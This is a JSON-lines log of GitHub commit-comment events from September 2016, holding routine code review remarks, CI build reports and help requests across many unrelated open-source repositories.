{"id":"4612365883","type":"CommitCommentEvent","actor":{"login":"francois-berder"},"repo":{"name":"francois-berder/LetMeCreate"},"payload":{"comment":{"id":19157571,"position":133,"line":171,"path":"src/click/alphanum.c","commit_id":"4077f55c179c4926ce2d0861800a8d15dda4cab1","created_at":"2016-09-24T11:03:15Z","updated_at":"2016-09-24T11:03:15Z","body":"Initialising the spi bus and selecting the right bus is the responsibility of the user. Wrappers always assume that i2c, spi or uart are initialised."}},"created_at":"2016-09-24T11:03:15Z"}
{"id":"4612366012","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":19157572,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-24T11:03:22Z","updated_at":"2016-09-24T11:03:22Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.178](http://build.clear-measure.com/viewLog.html?buildId=10689&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 72, ignored: 2 Build time: 00:02:50"}},"created_at":"2016-09-24T11:03:22Z"}
{"id":"4612366340","type":"CommitCommentEvent","actor":{"login":"raniamlj"},"repo":{"name":"hardmaru/write-rnn-tensorflow"},"payload":{"comment":{"id":19157573,"position":null,"line":null,"path":null,"commit_id":"fedcfc375d54af47826147010936770abff91b7d","created_at":"2016-09-24T11:03:44Z","updated_at":"2016-09-24T11:03:44Z","body":"hi !\r\ni have downloaded the database \r\nwhen i try to launch train with \" python train.py\"\r\ni get this error :\r\n\r\nWARNING:tensorflow:<tensorflow.python.ops.rnn_cell.BasicLSTMCell object at 0x7f8798cf2990>: Using a concatenated state is slower and will soon be deprecated.  Use state_is_tuple=True."}},"created_at":"2016-09-24T11:03:44Z"}
{"id":"4612367036","type":"CommitCommentEvent","actor":{"login":"raniamlj"},"repo":{"name":"hardmaru/write-rnn-tensorflow"},"payload":{"comment":{"id":19157574,"position":null,"line":null,"path":null,"commit_id":"fedcfc375d54af47826147010936770abff91b7d","created_at":"2016-09-24T11:04:18Z","updated_at":"2016-09-24T11:04:18Z","body":"\r\n\r\nhi !\r\ni have downloaded the database\r\nwhen i try to launch train with \" python train.py\"\r\ni get this error :\r\n\r\nWARNING:tensorflow:: Using a concatenated state is slower and will soon be deprecated. Use state_is_tuple=True.\r\n\r\n\r\nPlease help."}},"created_at":"2016-09-24T11:04:18Z"}
{"id":"4612367887","type":"CommitCommentEvent","actor":{"login":"francois-berder"},"repo":{"name":"francois-berder/LetMeCreate"},"payload":{"comment":{"id":19157576,"position":5,"line":20,"path":"src/click/co.c","commit_id":"4077f55c179c4926ce2d0861800a8d15dda4cab1","created_at":"2016-09-24T11:05:08Z","updated_at":"2016-09-24T11:05:08Z","body":"Well spotted. Actually, It should be: \r\n```c\r\n#include \"letmecreate/core/adc.h\"\r\n```\r\nCould you make another pull request for this change ?"}},"created_at":"2016-09-24T11:05:08Z"}
{"id":"4612369637","type":"CommitCommentEvent","actor":{"login":"clairscent"},"repo":{"name":"waigani/codelingo_demo"},"payload":{"comment":{"id":19157579,"position":null,"line":null,"path":null,"commit_id":"f917d6c31b995375020b3074dd3fc896504b425c","created_at":"2016-09-24T11:06:50Z","updated_at":"2016-09-24T11:06:50Z","body":"overall comment"}},"created_at":"2016-09-24T11:06:50Z"}
{"id":"4612369704","type":"CommitCommentEvent","actor":{"login":"clairscent"},"repo":{"name":"waigani/codelingo_demo"},"payload":{"comment":{"id":19157580,"position":null,"line":null,"path":null,"commit_id":"f917d6c31b995375020b3074dd3fc896504b425c","created_at":"2016-09-24T11:06:54Z","updated_at":"2016-09-24T11:06:54Z","body":"overall comment"}},"created_at":"2016-09-24T11:06:54Z"}
{"id":"4612369795","type":"CommitCommentEvent","actor":{"login":"clairscent"},"repo":{"name":"waigani/codelingo_demo"},"payload":{"comment":{"id":19157581,"position":null,"line":null,"path":null,"commit_id":"f917d6c31b995375020b3074dd3fc896504b425c","created_at":"2016-09-24T11:06:58Z","updated_at":"2016-09-24T11:06:58Z","body":"overall comment"}},"created_at":"2016-09-24T11:06:58Z"}
{"id":"4612369860","type":"CommitCommentEvent","actor":{"login":"clairscent"},"repo":{"name":"waigani/codelingo_demo"},"payload":{"comment":{"id":19157582,"position":null,"line":null,"path":null,"commit_id":"f917d6c31b995375020b3074dd3fc896504b425c","created_at":"2016-09-24T11:07:02Z","updated_at":"2016-09-24T11:07:02Z","body":"overall comment"}},"created_at":"2016-09-24T11:07:02Z"}
{"id":"4612369936","type":"CommitCommentEvent","actor":{"login":"clairscent"},"repo":{"name":"waigani/codelingo_demo"},"payload":{"comment":{"id":19157583,"position":null,"line":null,"path":null,"commit_id":"f917d6c31b995375020b3074dd3fc896504b425c","created_at":"2016-09-24T11:07:07Z","updated_at":"2016-09-24T11:07:07Z","body":"overall comment"}},"created_at":"2016-09-24T11:07:07Z"}
{"id":"4612370038","type":"CommitCommentEvent","actor":{"login":"clairscent"},"repo":{"name":"waigani/codelingo_demo"},"payload":{"comment":{"id":19157584,"position":null,"line":null,"path":null,"commit_id":"f917d6c31b995375020b3074dd3fc896504b425c","created_at":"2016-09-24T11:07:11Z","updated_at":"2016-09-24T11:07:11Z","body":"overall comment"}},"created_at":"2016-09-24T11:07:11Z"}
{"id":"4612371415","type":"CommitCommentEvent","actor":{"login":"jhnet3"},"repo":{"name":"jhnet3/gulp-jspm-build"},"payload":{"comment":{"id":19157588,"position":null,"line":null,"path":null,"commit_id":"23aaef6e0f72d596ffafce0091f906197e3ed4bb","created_at":"2016-09-24T11:08:29Z","updated_at":"2016-09-24T11:08:29Z","body":"Restored the original `istanbul cover ... jasmine` command, so the only changes are the bug fix.  (The `istanbul cover` error on  Windows can be addressed separately.)"}},"created_at":"2016-09-24T11:08:29Z"}
{"id":"4612372646","type":"CommitCommentEvent","actor":{"login":"clairscent"},"repo":{"name":"waigani/codelingo_demo"},"payload":{"comment":{"id":19157589,"position":null,"line":null,"path":null,"commit_id":"f917d6c31b995375020b3074dd3fc896504b425c","created_at":"2016-09-24T11:09:34Z","updated_at":"2016-09-24T11:09:34Z","body":"overall comment"}},"created_at":"2016-09-24T11:09:34Z"}
{"id":"4612373108","type":"CommitCommentEvent","actor":{"login":"Wilbertvn"},"repo":{"name":"PokemonGoF/PokemonGo-Bot"},"payload":{"comment":{"id":19157590,"position":39,"line":287,"path":"pokemongo_bot/cell_workers/pokemon_catch_worker.py","commit_id":"a45943e061e4936b56f21f71f6ff39398e24af52","created_at":"2016-09-24T11:09:56Z","updated_at":"2016-09-24T11:09:56Z","body":"@japokmn Same problem. Making this edit fixed my problem as well! "}},"created_at":"2016-09-24T11:09:56Z"}
{"id":"4612375514","type":"CommitCommentEvent","actor":{"login":"jamierocks"},"repo":{"name":"Minecrell/ServerListPlus"},"payload":{"comment":{"id":19157593,"position":null,"line":null,"path":null,"commit_id":"da2440f148d8866abcf8decb653260f9dcbab4f8","created_at":"2016-09-24T11:12:10Z","updated_at":"2016-09-24T11:12:10Z","body":":p"}},"created_at":"2016-09-24T11:12:10Z"}
{"id":"4612376011","type":"CommitCommentEvent","actor":{"login":"DrRamm"},"repo":{"name":"nitro-cancro/android_device_xiaomi_cancro"},"payload":{"comment":{"id":19157595,"position":null,"line":null,"path":null,"commit_id":"a5090a1bcbe033ab539908277a4cdf70ac4603f4","created_at":"2016-09-24T11:12:38Z","updated_at":"2016-09-24T11:12:38Z","body":"Спасибо, это были заготовки на тот момент, когда группа энтузиастов выкатит сорцы устройства на аосп/цээм для нугата - они пока закрыты. Тем временем один из них уже запилил прошиву =| .\r\nhttp://forum.xda-developers.com/xiaomi-mi-3/development/rom-nitrogen-os-n-substratum-23-09-2016-t3467316"}},"created_at":"2016-09-24T11:12:38Z"}
{"id":"4612376524","type":"CommitCommentEvent","actor":{"login":"PenguinsFlyGood"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":19157596,"position":null,"line":null,"path":null,"commit_id":"ed1ee704321450aa7d05af42e1e2f3e55a0cf708","created_at":"2016-09-24T11:13:09Z","updated_at":"2016-09-24T11:13:09Z","body":"how do I change the 2 hours to 15 minutes... before I just changed 3600 * 2 to 300 * 3"}},"created_at":"2016-09-24T11:13:09Z"}
{"id":"4612379317","type":"CommitCommentEvent","actor":{"login":"yevgnenll"},"repo":{"name":"yamoo9/JJ_CAMP"},"payload":{"comment":{"id":19157598,"position":null,"line":null,"path":null,"commit_id":"2dc8722423ff7a23c3b53bbf1ffa36ad2989a055","created_at":"2016-09-24T11:15:54Z","updated_at":"2016-09-24T11:15:54Z","body":"82번 라인에서 `target && target.nodeType !== 1 ` 이라는 조건으로\r\ntarget 의 유무를 확인했는데 \r\n114번 라인에서도 target이 존재하는지 확인하는 이유가 궁굼합니다 ㅜ"}},"created_at":"2016-09-24T11:15:54Z"}
{"id":"4612379996","type":"CommitCommentEvent","actor":{"login":"fritsch"},"repo":{"name":"xbmc/xbmc"},"payload":{"comment":{"id":19157599,"position":14,"line":46,"path":"xbmc/platform/overrides/linux/PlatformLinux.cpp","commit_id":"6954b02aa32c18bad6abbd2f8acc1af914189b40","created_at":"2016-09-24T11:16:33Z","updated_at":"2016-09-24T11:16:33Z","body":"take care: sizeof(line) == 32, but fgets only reads max: 32-1 = 31 chars to save space for the additional \\0 terminator via: http://www.cplusplus.com/reference/cstdio/fgets/"}},"created_at":"2016-09-24T11:16:33Z"}
{"id":"4612381336","type":"CommitCommentEvent","actor":{"login":"SnapperRy"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19157601,"position":null,"line":null,"path":null,"commit_id":"c152a5e6547ab0b46d79b3cf47ec5877ce834597","created_at":"2016-09-24T11:17:47Z","updated_at":"2016-09-24T11:17:47Z","body":"Indeed :) they had the same BroadcastTextId, and that is the one used to grab the text to use. So it said the same thing twice."}},"created_at":"2016-09-24T11:17:47Z"}
{"id":"4612383345","type":"CommitCommentEvent","actor":{"login":"todaylg"},"repo":{"name":"todaylg/todaylg.github.io"},"payload":{"comment":{"id":19157606,"position":null,"line":null,"path":null,"commit_id":"e866fa24cd59c7ca5cf6f5d87e7238a927e24561","created_at":"2016-09-24T11:19:48Z","updated_at":"2016-09-24T11:19:48Z","body":"back"}},"created_at":"2016-09-24T11:19:48Z"}
{"id":"4612384388","type":"CommitCommentEvent","actor":{"login":"gialloporpora"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19157609,"position":null,"line":null,"path":null,"commit_id":"e88d1d139596e8e9d94063b42f588bfc2bfbceb0","created_at":"2016-09-24T11:20:45Z","updated_at":"2016-09-24T11:20:45Z","body":"Ultime correzioni riportate da miki sul forum, commit 60853d5cc09e4b2e12545851e879c43304f7c9e1\r\n"}},"created_at":"2016-09-24T11:20:45Z"}
{"id":"4612384514","type":"CommitCommentEvent","actor":{"login":"chachachachacha"},"repo":{"name":"chachachachacha/chachachachacha.github.io"},"payload":{"comment":{"id":19157610,"position":null,"line":null,"path":null,"commit_id":"5156ede157fe04d31be7442a8e769417925639ce","created_at":"2016-09-24T11:20:51Z","updated_at":"2016-09-24T11:20:51Z","body":"d"}},"created_at":"2016-09-24T11:20:51Z"}
{"id":"4612385811","type":"CommitCommentEvent","actor":{"login":"xuanbka1"},"repo":{"name":"xuanbka1/Alogrithm-and-Application"},"payload":{"comment":{"id":19157612,"position":null,"line":null,"path":null,"commit_id":"74dc65ecc1508d18345b2180b0d395ef55864536","created_at":"2016-09-24T11:22:05Z","updated_at":"2016-09-24T11:22:05Z","body":"tìm m thỏa mãn m! > số thứ tự từ điển mà mình nhập vào để tính toán xem có bao nhiêu chữ số cần thay đổi:\r\n\r\nví dụ: in ra hoán vị thứ 7 trong từ điển của 100 số đàu tiên : 1  2 3 4 ....n;\r\n\r\ntìm 4!=m! >7 \r\nSuy ra: chỉ cần thay đổi 4 số cuối cùng của dãy chuỗi số đã cho: ( thứ tự từ điển : tổ hợp : wiki)\r\n\r\n4 số cần thay đổi là 97 98 99 100:\r\nta tìm số thứ 7 của hoán vị 4 số trên ròi in ra, nhớ chèn thêm số 1 đến 96 ra trước:\r\n\r\nnguồn bài toán : http://bkict.org/hustoj/problem/show/1009\r\n"}},"created_at":"2016-09-24T11:22:05Z"}
{"id":"4612385931","type":"CommitCommentEvent","actor":{"login":"chachachachacha"},"repo":{"name":"chachachachacha/chachachachacha.github.io"},"payload":{"comment":{"id":19157613,"position":4,"line":14,"path":"baseball.js","commit_id":"5156ede157fe04d31be7442a8e769417925639ce","created_at":"2016-09-24T11:22:12Z","updated_at":"2016-09-24T11:22:12Z","body":"s"}},"created_at":"2016-09-24T11:22:12Z"}
{"id":"4612385998","type":"CommitCommentEvent","actor":{"login":"chachachachacha"},"repo":{"name":"chachachachacha/chachachachacha.github.io"},"payload":{"comment":{"id":19157614,"position":7,"line":14,"path":"baseball.js","commit_id":"5156ede157fe04d31be7442a8e769417925639ce","created_at":"2016-09-24T11:22:16Z","updated_at":"2016-09-24T11:22:16Z","body":"s"}},"created_at":"2016-09-24T11:22:16Z"}
{"id":"4612387082","type":"CommitCommentEvent","actor":{"login":"chachachachacha"},"repo":{"name":"chachachachacha/chachachachacha.github.io"},"payload":{"comment":{"id":19157615,"position":7,"line":14,"path":"baseball.js","commit_id":"5156ede157fe04d31be7442a8e769417925639ce","created_at":"2016-09-24T11:23:20Z","updated_at":"2016-09-24T11:23:20Z","body":"d"}},"created_at":"2016-09-24T11:23:20Z"}
{"id":"4612387244","type":"CommitCommentEvent","actor":{"login":"chachachachacha"},"repo":{"name":"chachachachacha/chachachachacha.github.io"},"payload":{"comment":{"id":19157619,"position":18,"line":28,"path":"baseball.js","commit_id":"5156ede157fe04d31be7442a8e769417925639ce","created_at":"2016-09-24T11:23:29Z","updated_at":"2016-09-24T11:23:29Z","body":"asd"}},"created_at":"2016-09-24T11:23:29Z"}
{"id":"4612388110","type":"CommitCommentEvent","actor":{"login":"xuanbka1"},"repo":{"name":"xuanbka1/Alogrithm-and-Application"},"payload":{"comment":{"id":19157621,"position":null,"line":null,"path":null,"commit_id":"ef2e3cb7ec9c0affdd315fc765ac9f91ce4b4189","created_at":"2016-09-24T11:24:21Z","updated_at":"2016-09-24T11:24:21Z","body":"Duyệt từ đến cuối các chỉnh hợp được liệt kê ra.\r\ncứ duyệt được 1 chỉnh hợp thì cho biến cnt++;\r\nKhi nào cnt == stt (stt mình cần in ra ) thì in nó ra ngoài màn hình : Done !\r\n\r\nsource : http://bkict.org/hustoj/problem/show/1009"}},"created_at":"2016-09-24T11:24:21Z"}
{"id":"4612389207","type":"CommitCommentEvent","actor":{"login":"dingqz"},"repo":{"name":"dingqz/Java"},"payload":{"comment":{"id":19157623,"position":null,"line":null,"path":null,"commit_id":"66968316228e986e908ba77a8861abc8e719b50c","created_at":"2016-09-24T11:25:26Z","updated_at":"2016-09-24T11:25:26Z","body":"a数组和a2数组是否相等：true\r\na数组和b数组是否相等：false\r\nb数组的元素为：[3, 4, 5, 6, 0, 0]\r\nb数组的元素为：[3, 4, 1, 1, 0, 0]\r\nb数组的元素为：[0, 0, 1, 1, 3, 4]\r\n"}},"created_at":"2016-09-24T11:25:26Z"}
{"id":"4612390226","type":"CommitCommentEvent","actor":{"login":"jdolan"},"repo":{"name":"jdolan/quetoo"},"payload":{"comment":{"id":19157626,"position":21,"line":221,"path":"src/cgame/default/cg_hud.c","commit_id":"6f29562e712959380668e1b672dbfe86e6eeb52a","created_at":"2016-09-24T11:26:29Z","updated_at":"2016-09-24T11:26:29Z","body":"Not sure if a cvar for this is warranted, but that's fine."}},"created_at":"2016-09-24T11:26:29Z"}
{"id":"4612391677","type":"CommitCommentEvent","actor":{"login":"jdolan"},"repo":{"name":"jdolan/quetoo"},"payload":{"comment":{"id":19157629,"position":62,"line":367,"path":"src/cgame/default/cg_hud.c","commit_id":"6f29562e712959380668e1b672dbfe86e6eeb52a","created_at":"2016-09-24T11:27:54Z","updated_at":"2016-09-24T11:27:54Z","body":"So if cg_draw_deaths is 0, then you'd end up with a gap between frags and captures. This is why I'd probably do away with the cvar."}},"created_at":"2016-09-24T11:27:54Z"}
{"id":"4612391939","type":"CommitCommentEvent","actor":{"login":"anaymalpani"},"repo":{"name":"anaymalpani/opencart"},"payload":{"comment":{"id":19157631,"position":null,"line":null,"path":null,"commit_id":"77041c0e586edcf0e89d4c129611577840c6c6ad","created_at":"2016-09-24T11:28:09Z","updated_at":"2016-09-24T11:28:09Z","body":"after changes"}},"created_at":"2016-09-24T11:28:09Z"}
{"id":"4612392367","type":"CommitCommentEvent","actor":{"login":"akariv"},"repo":{"name":"OpenBudget/open-budget-api"},"payload":{"comment":{"id":19157632,"position":4,"line":15,"path":".travis.yml","commit_id":"3de3d0a29d97087e80ec832374cfbd372735b36e","created_at":"2016-09-24T11:28:32Z","updated_at":"2016-09-24T11:28:32Z","body":"The clone already does it I think"}},"created_at":"2016-09-24T11:28:32Z"}
{"id":"4612392458","type":"CommitCommentEvent","actor":{"login":"jdolan"},"repo":{"name":"jdolan/quetoo"},"payload":{"comment":{"id":19157633,"position":null,"line":null,"path":null,"commit_id":"6f29562e712959380668e1b672dbfe86e6eeb52a","created_at":"2016-09-24T11:28:36Z","updated_at":"2016-09-24T11:28:36Z","body":"👍 Thanks!"}},"created_at":"2016-09-24T11:28:36Z"}
{"id":"4612393045","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19157634,"position":null,"line":null,"path":null,"commit_id":"b070f84928de1d91be8fac5c451fd3cf9e2ff41c","created_at":"2016-09-24T11:29:12Z","updated_at":"2016-09-24T11:29:12Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 268](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1232&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **SUCCESS**\nSummary: Running Build time: 00:29:43"}},"created_at":"2016-09-24T11:29:12Z"}
{"id":"4612393462","type":"CommitCommentEvent","actor":{"login":"mgravell"},"repo":{"name":"dotnet/corefxlab"},"payload":{"comment":{"id":19157635,"position":null,"line":null,"path":null,"commit_id":"292ea78eecb4b6ec7cc35d7e4c59a010cf59fd54","created_at":"2016-09-24T11:29:39Z","updated_at":"2016-09-24T11:29:39Z","body":"3 thoughts:\r\n\r\n- it doesn't seem necessary for GetEnumerator to be on the interface. Any initial state should be set when the position indicates before start. Might benefit from extension method for convenience, though:\r\n\r\n\r\n    public Enumerator(ISequence<T> sequence) {....)\r\n\r\n    public static Enumerator<T> GetEnumerator<T>(this ISequence<T> sequence)\r\n         => new Enumerator<T>(sequence);\r\n\r\nThis also allows consumers to not use that API if they like. Not sure whether `foreach` works on extension APIs, though :(\r\n\r\n- feels like there's a missing equivalent to `Dispose` to cleanly wind down any iteration *when needed*, even if only partially consumed. Obviously can no-op otherwise. `Enumerator<T>.Dispose` should invoke this.\r\n\r\n- naming: `SequenceEnumerator<T>` ?"}},"created_at":"2016-09-24T11:29:39Z"}
{"id":"4612394707","type":"CommitCommentEvent","actor":{"login":"danielnaber"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":19157636,"position":null,"line":null,"path":null,"commit_id":"789fdaf49f970e33a7b95560f703b6204298303f","created_at":"2016-09-24T11:30:44Z","updated_at":"2016-09-24T11:30:44Z","body":"The latest fix now looks mostly good, but `entrée` and `café` are not accepted anymore. I don't think this is on purpose? Might be an encoding issue?\r\n\r\nHere are some new words that are accepted as okay now: I got these by comparing the result of checking 50K tatoeba sentences. @MikeUnwalla Can you confirm this looks good?\r\n\r\n```\r\neuro\r\ncaviar\r\ngonna\r\nonline\r\nPicasso\r\notitis\r\nwanna\r\nrailroad\r\noffense\r\nanytime\r\nmesmerize\r\nbaptizing\r\ndebut\r\ngiveaway\r\nalright\r\nencyclopedias\r\nyogurt\r\nYep\r\nknockout\r\n\r\n```"}},"created_at":"2016-09-24T11:30:44Z"}
{"id":"4612397900","type":"CommitCommentEvent","actor":{"login":"cooler-SAI"},"repo":{"name":"cooler-SAI/JadeCore548-patched"},"payload":{"comment":{"id":19157638,"position":null,"line":null,"path":null,"commit_id":"9b2a611994755a31169f90c2a497120ff326a6dc","created_at":"2016-09-24T11:33:57Z","updated_at":"2016-09-24T11:33:57Z","body":"Very Good Job!\r\nОтлично! xD"}},"created_at":"2016-09-24T11:33:57Z"}
{"id":"4612399546","type":"CommitCommentEvent","actor":{"login":"amahoola"},"repo":{"name":"unansweredocd/Portfolio"},"payload":{"comment":{"id":19157640,"position":null,"line":null,"path":null,"commit_id":"5315178d709c4ae43d48f3f1cf1456ef982dbb26","created_at":"2016-09-24T11:35:29Z","updated_at":"2016-09-24T11:35:29Z","body":"The mean reason that I pointed it out was to test the new code review system... It seems pretty nice. "}},"created_at":"2016-09-24T11:35:29Z"}
{"id":"4612400645","type":"CommitCommentEvent","actor":{"login":"mgravell"},"repo":{"name":"dotnet/corefxlab"},"payload":{"comment":{"id":19157642,"position":null,"line":null,"path":null,"commit_id":"292ea78eecb4b6ec7cc35d7e4c59a010cf59fd54","created_at":"2016-09-24T11:36:31Z","updated_at":"2016-09-24T11:36:31Z","body":"Ooh, `Dispose` *could* be cheated via calling `TryGetItem(end)`"}},"created_at":"2016-09-24T11:36:31Z"}
{"id":"4612400650","type":"CommitCommentEvent","actor":{"login":"caiosba"},"repo":{"name":"meedan/check-api"},"payload":{"comment":{"id":19157643,"position":16,"line":21,"path":"lib/pender_data.rb","commit_id":"e95d7473c6c9e3d22a78977cf4db388ab6728780","created_at":"2016-09-24T11:36:31Z","updated_at":"2016-09-24T11:36:31Z","body":"Should we set the annotator as Pender? Should an annotation \"embed\" type be displayed on the annotations list on the client side? @infojunkie "}},"created_at":"2016-09-24T11:36:31Z"}
{"id":"4612401377","type":"CommitCommentEvent","actor":{"login":"waylan"},"repo":{"name":"waylan/Python-Markdown"},"payload":{"comment":{"id":19157645,"position":5,"line":67,"path":"tests/extensions/attr_list.html","commit_id":"5881ae5235de7e8d57703aa33f49ed5fe7b79fee","created_at":"2016-09-24T11:37:12Z","updated_at":"2016-09-24T11:37:12Z","body":"Yes.  This is a slight change. The reason it that previously, the regex was parsing the key as `a=b` and the value as `c` (The function then split on the first `=`, so the output appeared fine, but a bug still existed). Of course, the key should only contain `a`, which is does now. \r\n\r\nSo the question is, should we allow an `=` in a value if the value is not quoted? I think not. If that results in data loss, I'm okay with that. The author needs to edit the document to wrap the value in quotes."}},"created_at":"2016-09-24T11:37:12Z"}
{"id":"4612401671","type":"CommitCommentEvent","actor":{"login":"unansweredocd"},"repo":{"name":"unansweredocd/Portfolio"},"payload":{"comment":{"id":19157646,"position":null,"line":null,"path":null,"commit_id":"5315178d709c4ae43d48f3f1cf1456ef982dbb26","created_at":"2016-09-24T11:37:30Z","updated_at":"2016-09-24T11:37:30Z","body":"Hmm alright. "}},"created_at":"2016-09-24T11:37:30Z"}
{"id":"4612402032","type":"CommitCommentEvent","actor":{"login":"imcaffrey"},"repo":{"name":"racaljk/hosts"},"payload":{"comment":{"id":19157647,"position":null,"line":null,"path":null,"commit_id":"736769cd8a7d671753d8b42bbfb50d815ba979e3","created_at":"2016-09-24T11:37:50Z","updated_at":"2016-09-24T11:37:50Z","body":"> Merge branch 'master' of github.com:racaljk/hosts\r\n\r\n???"}},"created_at":"2016-09-24T11:37:50Z"}
{"id":"4612402147","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19157648,"position":null,"line":null,"path":null,"commit_id":"f4eb0447f0b6ae843b22a19fe2b717cb90afd619","created_at":"2016-09-24T11:37:57Z","updated_at":"2016-09-24T11:37:57Z","body":"for_cbes (YixingChen) - Win64-Windows-7-VisualStudio-12: OK (2417 of 2447 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-f4eb0447f0b6ae843b22a19fe2b717cb90afd619-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-f4eb0447f0b6ae843b22a19fe2b717cb90afd619-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-98.77%25-yellow.svg)</a> \n"}},"created_at":"2016-09-24T11:37:57Z"}
{"id":"4612403674","type":"CommitCommentEvent","actor":{"login":"imknown"},"repo":{"name":"racaljk/hosts"},"payload":{"comment":{"id":19157650,"position":null,"line":null,"path":null,"commit_id":"736769cd8a7d671753d8b42bbfb50d815ba979e3","created_at":"2016-09-24T11:39:20Z","updated_at":"2016-09-24T11:39:20Z","body":"这是整理?"}},"created_at":"2016-09-24T11:39:20Z"}
{"id":"4612404817","type":"CommitCommentEvent","actor":{"login":"xjt283525476"},"repo":{"name":"xjt283525476/learngit"},"payload":{"comment":{"id":19157652,"position":null,"line":null,"path":null,"commit_id":"1ec034c123cf0790fbca0bbe3233a59d48bfbb71","created_at":"2016-09-24T11:40:21Z","updated_at":"2016-09-24T11:40:21Z","body":"keyi"}},"created_at":"2016-09-24T11:40:21Z"}
{"id":"4612405891","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19157653,"position":null,"line":null,"path":null,"commit_id":"9235685d22508fbbed29a2f81a553749d9219c7f","created_at":"2016-09-24T11:41:19Z","updated_at":"2016-09-24T11:41:19Z","body":"os_2_0_develop (macumber) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-9235685d22508fbbed29a2f81a553749d9219c7f-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-9235685d22508fbbed29a2f81a553749d9219c7f-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-24T11:41:19Z"}
{"id":"4612405895","type":"CommitCommentEvent","actor":{"login":"simison"},"repo":{"name":"Trustroots/trustroots"},"payload":{"comment":{"id":19157654,"position":8,"line":292,"path":"modules/messages/server/controllers/messages.server.controller.js","commit_id":"ef29697ea289ef8447b9a18b5852b5ed094c294d","created_at":"2016-09-24T11:41:20Z","updated_at":"2016-09-24T11:41:20Z","body":"What was ther error code?"}},"created_at":"2016-09-24T11:41:20Z"}
{"id":"4612405958","type":"CommitCommentEvent","actor":{"login":"c14006078"},"repo":{"name":"c14006078/phonebook-1"},"payload":{"comment":{"id":19157655,"position":16,"line":15,"path":"phonebook_opt.c","commit_id":"93ec8878cbfbb0fe8dcf990cae536c1d95afb4e8","created_at":"2016-09-24T11:41:23Z","updated_at":"2016-09-24T11:41:23Z","body":"ok. I will try this."}},"created_at":"2016-09-24T11:41:23Z"}
{"id":"4612406071","type":"CommitCommentEvent","actor":{"login":"Too-Naive"},"repo":{"name":"racaljk/hosts"},"payload":{"comment":{"id":19157656,"position":null,"line":null,"path":null,"commit_id":"736769cd8a7d671753d8b42bbfb50d815ba979e3","created_at":"2016-09-24T11:41:28Z","updated_at":"2016-09-24T11:41:28Z","body":"…push忘记fetch了\r\n\r\n\r\n\r\nOn \"imknown J. Kimu\" <notifications@github.com>, Sep 24, 2016 7:40 PM wrote:\r\n\r\n这是整理?\r\n\r\n—\r\nYou are receiving this because you authored the thread.\r\nReply to this email directly, view it on GitHub<https://github.com/racaljk/hosts/commit/736769cd8a7d671753d8b42bbfb50d815ba979e3#commitcomment-19157650>, or mute the thread<https://github.com/notifications/unsubscribe-auth/APu4H0bGoMEo9p1IplmvYrxhffZl-tORks5qtQwOgaJpZM4KFn1P>.\r\n"}},"created_at":"2016-09-24T11:41:28Z"}
{"id":"4612407190","type":"CommitCommentEvent","actor":{"login":"simison"},"repo":{"name":"Trustroots/trustroots"},"payload":{"comment":{"id":19157660,"position":7,"line":291,"path":"modules/messages/server/controllers/messages.server.controller.js","commit_id":"ef29697ea289ef8447b9a18b5852b5ed094c294d","created_at":"2016-09-24T11:42:35Z","updated_at":"2016-09-24T11:42:35Z","body":"Errors could be logged directly at `messageToInfluxService`?"}},"created_at":"2016-09-24T11:42:35Z"}
{"id":"4612408935","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19157665,"position":null,"line":null,"path":null,"commit_id":"9235685d22508fbbed29a2f81a553749d9219c7f","created_at":"2016-09-24T11:44:12Z","updated_at":"2016-09-24T11:44:12Z","body":"os_2_0_develop (macumber) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-9235685d22508fbbed29a2f81a553749d9219c7f-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-9235685d22508fbbed29a2f81a553749d9219c7f-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-24T11:44:12Z"}
